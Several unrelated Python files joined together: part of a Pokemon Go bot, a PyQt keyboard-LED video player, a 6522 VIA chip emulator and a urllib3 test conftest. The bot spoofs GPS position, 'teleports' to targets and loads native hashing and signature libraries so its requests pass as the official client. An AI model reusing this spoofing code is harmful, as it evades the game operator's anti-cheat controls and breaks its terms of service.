parameters=('badge', 'level')
)
self.event_manager.register_event(
'player_data',
parameters=('player_data', )
)
self.event_manager.register_event(
'forts_found',
parameters=('json')
)
# UseIncense
self.event_manager.register_event(
'use_incense',
parameters=('type', 'incense_count')
)
# BuddyPokemon
self.event_manager.register_event(
'buddy_update',
parameters=('name')
)
self.event_manager.register_event(
'buddy_update_fail',
parameters=('name', 'error')
)
self.event_manager.register_event(
'buddy_candy_earned',
parameters=('candy', 'family', 'quantity', 'candy_earned', 'candy_limit')
)
self.event_manager.register_event('buddy_candy_fail')
self.event_manager.register_event(
'buddy_next_reward',
parameters=('name', 'km_walked', 'km_total')
)
self.event_manager.register_event('buddy_keep_active')
self.event_manager.register_event(
'buddy_not_available',
parameters=('name')
)
# Sniper
self.event_manager.register_event('sniper_log', parameters=('message', 'message'))
self.event_manager.register_event('sniper_error', parameters=('message', 'message'))
self.event_manager.register_event('sniper_teleporting', parameters=('latitude', 'longitude', 'name'))
# Catch-limiter
self.event_manager.register_event('catch_limit_on')
self.event_manager.register_event('catch_limit_off')
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
if self.sleep_schedule:
self.sleep_schedule.work()
now = time.time() * 1000
for fort in self.cell["forts"]:
timeout = fort.get("cooldown_complete_timestamp_ms", 0)
if timeout >= now:
self.fort_timeouts[fort["id"]] = timeout
self._refresh_inventory()
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position)
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
nearby_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
if "nearby_pokemons" in cell and len(cell["nearby_pokemons"]):
latlng = LatLng.from_point(Cell(CellId(cell["s2_cell_id"])).get_center())
for p in cell["nearby_pokemons"]:
p["latitude"] = latlng.lat().degrees
p["longitude"] = latlng.lng().degrees
p["s2_cell_id"] = cell["s2_cell_id"]
nearby_pokemons += cell["nearby_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons,
"nearby_pokemons": nearby_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons,
"nearby_pokemons": nearby_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = self.api._position_alt
# dont cache when teleport_to
if self.api.teleporting:
return
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
try:
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'alt': alt, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def emit_forts_event(self,response_dict):
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
if map_cells and len(map_cells):
for cell in map_cells:
if "forts" in cell and len(cell["forts"]):
self.event_manager.emit(
'forts_found',
sender=self,
level='debug',
formatted='Found forts {json}',
data={'json': json.dumps(cell["forts"])}
)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
# prevent crash if return not numeric value
if not str(self.api._auth_provider._ticket_expire).isdigit():
self.logger.info("Ticket expired value is not numeric", 'yellow')
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
self.api = ApiWrapper(config=self.config)
self.api.set_position(*position)
self.login()
self.api.set_signature_lib(self.get_encryption_lib())
self.api.set_hash_lib(self.get_hash_lib())
def login(self):
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, self.alt) # or should the alt kept to zero?
try:
self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password))
except AuthException as e:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted='Login process failed: {}'.format(e));
sys.exit()
with self.database as conn:
c = conn.cursor()
c.execute("SELECT COUNT(name) FROM sqlite_master WHERE type='table' AND name='login'")
result = c.fetchone()
if result[0] == 1:
conn.execute('''INSERT INTO login (timestamp, message) VALUES (?, ?)''', (time.time(), 'LOGIN_SUCCESS'))
else:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login table not founded, skipping log"
)
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
self.heartbeat()
def get_encryption_lib(self):
if _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
if sys.maxsize > 2**32:
file_name = 'src/pgoapi/pgoapi/lib/encrypt64.dll'
else:
file_name = 'src/pgoapi/pgoapi/lib/encrypt32.dll'
if _platform.lower() == "darwin":
file_name= 'src/pgoapi/pgoapi/lib/libencrypt-osx-64.so'
if _platform.lower() == "linux" or _platform.lower() == "linux2":
file_name = 'src/pgoapi/pgoapi/lib/libencrypt-linux-x86-64.so'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
self.logger.error(file_name + ' is not found! Please place it in the bots root directory or set encrypt_location in config.')
self.logger.info('Platform: '+ _platform + ' ' + file_name + ' directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' ' + file_name + ' directory: ' + path)
return full_path
def get_hash_lib(self):
if _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
if sys.maxsize > 2**32:
file_name = 'src/pgoapi/pgoapi/lib/niantichash64.dll'
else:
file_name = 'src/pgoapi/pgoapi/lib/niantichash32.dll'
if _platform.lower() == "darwin":
file_name= 'src/pgoapi/pgoapi/lib/libniantichash-osx-64.so'
if _platform.lower() == "linux" or _platform.lower() == "linux2":
file_name = 'src/pgoapi/pgoapi/lib/libniantichash-linux-x86-64.so'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
self.logger.error(file_name + ' is not found! Please place it in the bots root directory')
self.logger.info('Platform: '+ _platform + ' ' + file_name + ' directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' ' + file_name + ' directory: ' + path)
return full_path
def _setup_api(self):
# instantiate pgoapi @var ApiWrapper
self.api = ApiWrapper(config=self.config)
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self.api.set_signature_lib(self.get_encryption_lib())
self.api.set_hash_lib(self.get_hash_lib())
self.logger.info('')
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
response_dict = self.api.get_player()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
self._print_character_info()
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
stardust = '0'
items_inventory = inventory.items()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.logger.info(
'Pokemon Bag: {}/{}'.format(
inventory.Pokemons.get_space_used(),
inventory.get_pokemon_inventory_size()
)
)
self.logger.info(
'Items: {}/{}'.format(
inventory.Items.get_space_used(),
inventory.get_item_inventory_size()
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_inventory.get(1).count) +
' | GreatBalls: ' + str(items_inventory.get(2).count) +
' | UltraBalls: ' + str(items_inventory.get(3).count) +
' | MasterBalls: ' + str(items_inventory.get(4).count))
self.logger.info(
'RazzBerries: ' + str(items_inventory.get(701).count) +
' | BlukBerries: ' + str(items_inventory.get(702).count) +
' | NanabBerries: ' + str(items_inventory.get(703).count))
self.logger.info(
'LuckyEgg: ' + str(items_inventory.get(301).count) +
' | Incubator: ' + str(items_inventory.get(902).count) +
' | TroyDisk: ' + str(items_inventory.get(501).count))
self.logger.info(
'Potion: ' + str(items_inventory.get(101).count) +
' | SuperPotion: ' + str(items_inventory.get(102).count) +
' | HyperPotion: ' + str(items_inventory.get(103).count) +
' | MaxPotion: ' + str(items_inventory.get(104).count))
self.logger.info(
'Incense: ' + str(items_inventory.get(401).count) +
' | IncenseSpicy: ' + str(items_inventory.get(402).count) +
' | IncenseCool: ' + str(items_inventory.get(403).count))
self.logger.info(
'Revive: ' + str(items_inventory.get(201).count) +
' | MaxRevive: ' + str(items_inventory.get(202).count))
self.logger.info('')
def _print_list_pokemon(self):
# get pokemon list
bag = inventory.pokemons().all()
id_list =list(set(map(lambda x: x.pokemon_id, bag)))
id_list.sort()
pokemon_list = [filter(lambda x: x.pokemon_id == y, bag) for y in id_list]
show_count = self.config.pokemon_bag_show_count
show_candies = self.config.pokemon_bag_show_candies
poke_info_displayed = self.config.pokemon_bag_pokemon_info
def get_poke_info(info, pokemon):
poke_info = {
'cp': 'CP {}'.format(pokemon.cp),
'iv_ads': 'A/D/S {}/{}/{}'.format(pokemon.iv_attack, pokemon.iv_defense, pokemon.iv_stamina),
'iv_pct': 'IV {}'.format(pokemon.iv),
'ivcp': 'IVCP {}'.format(round(pokemon.ivcp,2)),
'ncp': 'NCP {}'.format(round(pokemon.cp_percent,2)),
'level': "Level {}".format(pokemon.level),
'hp': 'HP {}/{}'.format(pokemon.hp, pokemon.hp_max),
'moveset': 'Moves: {}'.format(pokemon.moveset),
'dps': 'DPS {}'.format(round(pokemon.moveset.dps, 2))
}
if info not in poke_info:
raise ConfigException("info '{}' isn't available for displaying".format(info))
return poke_info[info]
self.logger.info('Pokemon:')
for pokes in pokemon_list:
pokes.sort(key=lambda p: p.cp, reverse=True)
line_p = '#{} {}'.format(pokes[0].pokemon_id, pokes[0].name)
if show_count:
line_p += '[{}]'.format(len(pokes))
if show_candies:
line_p += '[{} candies]'.format(pokes[0].candy_quantity)
line_p += ': '
poke_info = ['({})'.format(', '.join([get_poke_info(x, p) for x in poke_info_displayed])) for p in pokes]
self.logger.info(line_p + ' | '.join(poke_info))
self.logger.info('')
def use_lucky_egg(self):
return self.api.use_item_xp_boost(item_id=301)
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.wake_location:
msg = "Wake up location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': self.wake_location['raw'],
'position': self.wake_location['coord']
}
)
self.api.set_position(*self.wake_location['coord'])
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
json_file = os.path.join(_base_dir, 'data', 'last-location-%s.json' % self.config.username)
try:
with open(json_file, "r") as infile:
location_json = json.load(infile)
except (IOError, ValueError):
# Unable to read json file.
# File may be corrupt. Create a new one.
location_json = []
except:
raise FileIOException("Unexpected error reading from {}".web_inventory)
location = (
location_json['lat'],
location_json['lng'],
location_json['alt'],
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if given location name, belongs to favorite_locations
favorite_location_coords = self._get_pos_by_fav_location(location_name)
if favorite_location_coords is not None:
return favorite_location_coords
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
"[-]?\d{1,3}(?:[.]\d+)?", location_name
)
if len(possible_coordinates) >= 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), (float(possible_coordinates[2]) if len(possible_coordinates) == 3 else self.alt)
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def _get_pos_by_fav_location(self, location_name):
location_name = location_name.lower()
coords = None
for location in self.config.favorite_locations:
if location.get('name').lower() == location_name:
coords = re.findall(
"[-]?\d{1,3}[.]\d{3,7}", location.get('coords').strip()
)
if len(coords) >= 2:
self.logger.info('Favorite location found: {} ({})'.format(location_name, coords))
break
#TODO: This is real bad
if coords is None:
return coords
else:
return float(coords[0]), float(coords[1]), (float(coords[2]) if len(coords) == 3 else self.alt)
def heartbeat(self):
# Remove forts that we can now spin again.
now = time.time()
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= now * 1000}
if now - self.last_heartbeat >= self.heartbeat_threshold and not self.hb_locked:
self.last_heartbeat = now
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
responses = request.call()
if responses['responses']['GET_PLAYER']['success'] == True:
# we get the player_data anyway, might as well store it
self._player = responses['responses']['GET_PLAYER']['player_data']
self.event_manager.emit(
'player_data',
sender=self,
level='debug',
formatted='player_data: {player_data}',
data={'player_data': self._player}
)
if responses['responses']['CHECK_AWARDED_BADGES']['success'] == True:
# store awarded_badges reponse to be used in a task or part of heartbeat
self._awarded_badges = responses['responses']['CHECK_AWARDED_BADGES']
if 'awarded_badges' in self._awarded_badges:
i = 0
for badge in self._awarded_badges['awarded_badges']:
badgelevel = self._awarded_badges['awarded_badge_levels'][i]
badgename = BadgeType_pb2._BADGETYPE.values_by_number[badge].name
i += 1
self.event_manager.emit(
'badges',
sender=self,
level='info',
formatted='awarded badge: {badge}, lvl {level}',
data={'badge': badgename,
'level': badgelevel}
)
human_behaviour.action_delay(3, 10)
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
threading.Timer(self.heartbeat_threshold, self.heartbeat).start()
def update_web_location_worker(self):
while True:
self.web_update_queue.get()
self.update_web_location()
def display_player_info(self):
player_stats = player()
if player_stats:
nextlvlxp = (int(player_stats.next_level_xp) - int(player_stats.exp))
self.logger.info(
'Level: {}'.format(player_stats.level) +
' (Next Level: {} XP)'.format(nextlvlxp) +
' (Total: {} XP)'
''.format(player_stats.exp))
self.logger.info(
'Pokemon Captured: '
'{}'.format(player_stats.pokemons_captured) +
' | Pokestops Visited: '
'{}'.format(player_stats.poke_stop_visits))
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' in fort]
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
self.last_map_object = self.api.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.emit_forts_event(self.last_map_object)
#if self.last_map_object:
# print self.last_map_object
self.last_time_map_object = time.time()
return self.last_map_object
def _load_recent_forts(self):
if not self.config.forts_cache_recent_forts:
return
cached_forts_path = os.path.join(_base_dir, 'data', 'recent-forts-%s.json' % self.config.username)
try:
# load the cached recent forts
cached_recent_forts = []
try:
with open(cached_forts_path) as f:
cached_recent_forts = json.load(f)
except (IOError, ValueError) as e:
self.logger.info('[x] Error while opening cached forts: %s' % e)
except:
raise FileIOException("Unexpected error opening {}".cached_forts_path)
num_cached_recent_forts = len(cached_recent_forts)
num_recent_forts = len(self.recent_forts)
# Handles changes in max_circle_size
if not num_recent_forts:
self.recent_forts = []
elif num_recent_forts > num_cached_recent_forts:
self.recent_forts[-num_cached_recent_forts:] = cached_recent_forts
elif num_recent_forts < num_cached_recent_forts:
self.recent_forts = cached_recent_forts[-num_recent_forts:]
else:
self.recent_forts = cached_recent_forts
self.event_manager.emit(
'loaded_cached_forts',
sender=self,
level='debug',
formatted='Loaded cached forts...'
)
except IOError:
self.event_manager.emit(
'no_cached_forts',
sender=self,
level='debug',
formatted='Starting new cached forts for {path}',
data={'path': cached_forts_path}
)
def _refresh_inventory(self):
# Perform inventory update every n seconds
now = time.time()
if now - self.last_inventory_refresh >= self.inventory_refresh_threshold:
inventory.refresh_inventory()
self.last_inventory_refresh = now
self.inventory_refresh_counter += 1
|
maingui.py
|
from mainwin import *
from PyQt5.QtCore import (QByteArray, QDataStream, QFile, QFileInfo,
QIODevice, QPoint, QPointF, QRectF, Qt, QTimer)
from PyQt5.QtWidgets import QApplication, QMainWindow, QFileDialog,QGraphicsScene,QGraphicsPixmapItem,QGraphicsItem,QStyle,QGraphicsTextItem,QMenu
from PyQt5.QtGui import QImage,QPen,QBrush,QTransform,QColor
from PyQt5.QtGui import QPixmap
import sys
import cv2
import numpy as np
import threading
from kbled import keyboard_led
from kbapi import keyboard_ctl
class My_Application(QMainWindow, Ui_MainWindow):
def __init__(self):
super().__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.ui.tabWidget.setCurrentIndex(0)
self.kb = keyboard_ctl()
self.leds=keyboard_led(self.kb)
self.video_opened=False
self.video_running=False
self.leddata=bytearray(272)
self.ui.mode_set_btn.clicked.connect(self.set_mode_func)
self.ui.connect_btn.clicked.connect(self.connectfunc)
self.ui.stop_btn.clicked.connect(self.stopfunc)
self.ui.video_play_btn.clicked.connect(self.videofunc)
self.videothreadid = threading.Thread(target=self.videothread)
self.videolock=threading.Lock()
self.previewtimer=QTimer()
self.previewtimer.timeout.connect(self.updateperview)
self.videotimer=QTimer()
self.videotimer.timeout.connect(self.videotimerfunc)
def connectfunc(self):
self.kb.init_hid_interface()
if(self.kb.wait_for_kb(1000)==False):
self.ui.logbox.appendPlainText("Connect Failed\n")
self.kb.stop_and_wait()
return
self.startTimer()
def stopfunc(self):
self.stopTimer()
self.stopvideo()
self.kb.stop_and_wait()
def closeEvent(self, event):
self.kb.stop_and_wait()
self.stopvideo()
def set_mode_func(self):
if self.kb.isdeviceoen==False:
return
try:
mode=int(self.ui.modebox.text())
except:
mode=0
self.leds.switchmode(mode)
def startTimer(self):
self.previewtimer.start(100)
def stopTimer(self):
self.previewtimer.stop()
def updateperview(self):
if(self.kb.wait_for_kb(1000)==False):return
if(self.video_running==False):
lens,self.leddata=self.leds.getled()
if(lens<0):
return
width=(self.ui.preview_box.width()-10)
height=(self.ui.preview_box.height()-10)
img=self.leds.getpreview_rgb(self.leddata,(width,height))
previewimg = QImage(img,
width, height, width*3,
QImage.Format_RGB888)
pix = QPixmap.fromImage(previewimg)
self.preitem = QGraphicsPixmapItem(pix)
self.preitem.setScale(1)
self.prescene = QGraphicsScene()
self.prescene.addItem(self.preitem)
self.ui.preview_box.setScene(self.prescene)
def videofunc(self):
if self.kb.wait_for_kb(100)==False:
return
if self.videothreadid.is_alive():
self.video_running=False
self.videothreadid.join()
self.videolink=self.ui.video_link_box.text()
self.cvvideo=cv2.VideoCapture()
self.cvvideo.open(self.videolink)
if(self.cvvideo.isOpened()):
self.leds.switchmode(0xff)
fps=self.cvvideo.get(cv2.CAP_PROP_FPS)
self.videotimer.start(int(np.floor(1000/fps)))
self.video_opened=True
self.video_running=True
self.videothreadid = threading.Thread(target=self.videothread)
self.videothreadid.start()
def videotimerfunc(self):
if(self.videolock.locked()):
self.videolock.release()
def videothread(self):
kbresetflag=False
while self.video_running and self.video_opened:
self.videolock.acquire()
if kbresetflag:
self.leds.switchmode(0xff)
ret, frame1 = self.cvvideo.read()
if(ret):
if self.kb.wait_for_kb(100) == False:
kbresetflag=True
continue
self.leddata=self.leds.play_frame_full(frame1)
else:
self.cvvideo.set(cv2.CAP_PROP_POS_FRAMES,0)
# kb.stop_and_wait()
# sys.exit(0)
def stopvideo(self):
if self.videothreadid.is_alive():
self.video_running=False
self.videolock.release()
self.videothreadid.join()
self.cvvideo.release()
self.video_opened=False
self.videotimer.stop()
if __name__ == '__main__':
app = QApplication(sys.argv)
class_instance = My_Application()
class_instance.show()
sys.exit(app.exec_())
|
via65c22.py
|
import sys
import time
import threading
from py65.utils import console
from py65816.utils import db_console
class VIA():
SR = 4
SET_CLEAR = 128
def __init__(self, start_addr, mpu):
self.mpu = mpu
self.VIA_SR = start_addr + 0x0a # shift register
self.VIA_IFR = start_addr + 0x0d # interrupt flags register
self.VIA_IER = start_addr + 0x0e # interrupt enable register
self.SRThread = False
self.escape = False
self.name = 'VIA'
# init
self.reset()
self.install_interrupts()
def install_interrupts(self):
def getc(address):
char = console.getch_noblock(sys.stdin)
time.sleep(.1) # reduce cpu usage (~55% to ~2%) in Forth interpret loop (comment out for full speed ops)
if char:
byte = ord(char)
if self.escape:
self.escape = False
if byte == 0x51 or byte == 0x71:
self.mpu.pc = 65527 # set pc to a break instruction which drops us to the monitor program
byte = 0
else:
if byte == 0x1b:
self.escape = True
byte = 0
else:
self.mpu.memory[self.VIA_IFR] &= 0xfb
else:
byte = 0
return byte
def SR_enable(address, value):
if value & self.SET_CLEAR:
# enable interrupts
if value & self.SR and not self.SRThread:
t = threading.Thread(target=SR_thread, daemon = True)
self.SRThread = True
t.start()
else:
# disable interrupts
if value & self.SR and self.SRThread:
self.SRThread = False
def SR_thread():
mpu = self.mpu
while(self.SRThread):
# See ACIA for discussion of giving emulator time to process interrupt
# time.sleep(.05)
if (mpu.IRQ_pin == 1) and (mpu.p & mpu.INTERRUPT == 0):
if (mpu.p & mpu.INTERRUPT == 0) and mpu.IRQ_pin:
if db_console.kbhit():
mpu.memory[self.VIA_IFR] |= 0x04
mpu.IRQ_pin = 0
count_irq = 0 # we need a short delay here
while count_irq < 100:
count_irq += 1
else:
# pause to reduce system resources churning when
# we're waiting for keyboard input
time.sleep(0.05)
else:
time.sleep(0.001)
self.mpu.memory.subscribe_to_write([self.VIA_IER], SR_enable)
self.mpu.memory.subscribe_to_read([self.VIA_SR], getc)
def reset(self):
self.mpu.memory[self.VIA_IER] = 0
self.mpu.memory[self.VIA_IFR] = 0
#def irq(self):
#return (IFR6 and IER6) or (IFR5 and IER5) or (IFR4 and IER4) or (IFR3 and IER3) or (IFR2 and IER2) or (IFR1 and IER1) or (IFR0 and IER0)
#return (self.mpu.memory[self.VIA_IFR] and self.SR) and ((self.mpu.memory[self.VIA_IER] and self.SR))
|
conftest.py
|
import collections
import contextlib
import platform
import socket
import ssl
import sys
import threading
import pytest
import trustme
from tornado import ioloop, web
from dummyserver.handlers import TestingApp
from dummyserver.server import HAS_IPV6, run_tornado_app
from dummyserver.testcase import HTTPSDummyServerTestCase
from urllib3.util import ssl_
from .tz_stub import stub_timezone_ctx
# The Python 3.8+ default loop on Windows breaks Tornado
@pytest.fixture(scope="session", autouse=True)
def configure_windows_event_loop():
if sys.version_info >= (3, 8) and platform.system() == "Windows":
import asyncio
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
ServerConfig = collections.namedtuple("ServerConfig", ["host", "port", "ca_certs"])
@contextlib.contextmanager
def run_server_in_thread(scheme, host, tmpdir, ca, server_cert):
ca_cert_path = str(tmpdir / "ca.pem")
server_cert_path = str(tmpdir / "server.pem")
server_key_path = str(tmpdir / "server.key")
ca.cert_pem.write_to_path(ca_cert_path)
server_cert.private_key_pem.write_to_path(server_key_path)
server_cert.cert_chain_pems[0].write_to_path(server_cert_path)
server_certs = {"keyfile": server_key_path, "certfile": server_cert_path}
io_loop = ioloop.IOLoop.current()
app = web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(app, io_loop, server_certs, scheme, host)
server_thread = threading.Thread(target=io_loop.start)
server_thread.start()
yield ServerConfig(host, port, ca_cert_path)
io_loop.add_callback(server.stop)
io_loop.add_callback(io_loop.stop)
server_thread.join()
@pytest.fixture
def no_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# only common name, no subject alternative names
server_cert = ca.issue_cert(common_name="localhost")
with run_server_in_thread("https", "localhost", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ip_san_server(tmp_path_factory):
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert("127.0.0.1")
with run_server_in_thread("https", "127.0.0.1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def ipv6_san_server(tmp_path_factory):
if not HAS_IPV6:
pytest.skip("Only runs on IPv6 systems")
tmpdir = tmp_path_factory.mktemp("certs")
ca = trustme.CA()
# IP address in Subject Alternative Name
server_cert = ca.issue_cert("::1")
with run_server_in_thread("https", "::1", tmpdir, ca, server_cert) as cfg:
yield cfg
@pytest.fixture
def stub_timezone(request):
"""
A pytest fixture that runs the test with a stub timezone.
"""
with stub_timezone_ctx(request.param):
yield
@pytest.fixture(scope="session")
def supported_tls_versions():
# We have to create an actual TLS connection
# to test if the TLS version is not disabled by
# OpenSSL config. Ubuntu 20.04 specifically
# disables TLSv1 and TLSv1.1.
tls_versions = set()
_server = HTTPSDummyServerTestCase()
_server._start_server()
for _ssl_version_name in (
"PROTOCOL_TLSv1",
"PROTOCOL_TLSv1_1",
"PROTOCOL_TLSv1_2",
"PROTOCOL_TLS",
):
_ssl_version = getattr(ssl, _ssl_version_name, 0)
if _ssl_version == 0:
continue
_sock = socket.create_connection((_server.host, _server.port))
try:
_sock = ssl_.ssl_wrap_socket(
_sock, cert_reqs=ssl.CERT_NONE, ssl_version=_ssl_version
)
except ssl.SSLError:
pass
else:
tls_versions.add(_sock.version())
_sock.close()
_server._stop_server()
return tls_versions
@pytest.fixture(scope="function")
def requires_tlsv1(supported_tls_versions):
"""Test requires TLSv1 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1") or "TLSv1" not in supported_tls_versions:
pytest.skip("Test requires TLSv1")
@pytest.fixture(scope="function")
def requires_tlsv1_1(supported_tls_versions):
"""Test requires TLSv1.1 available"""
if not hasattr(ssl, "PROTOCOL_TLSv1_1") or "TLSv1.1" not in supported_tls_versions:
pytest.skip("Test requires TLSv1.1")
@pytest.fixture(scope="function")
def requires_tlsv1_2(supported_tls_versions):
"""Test requires TLSv1.2 available"""
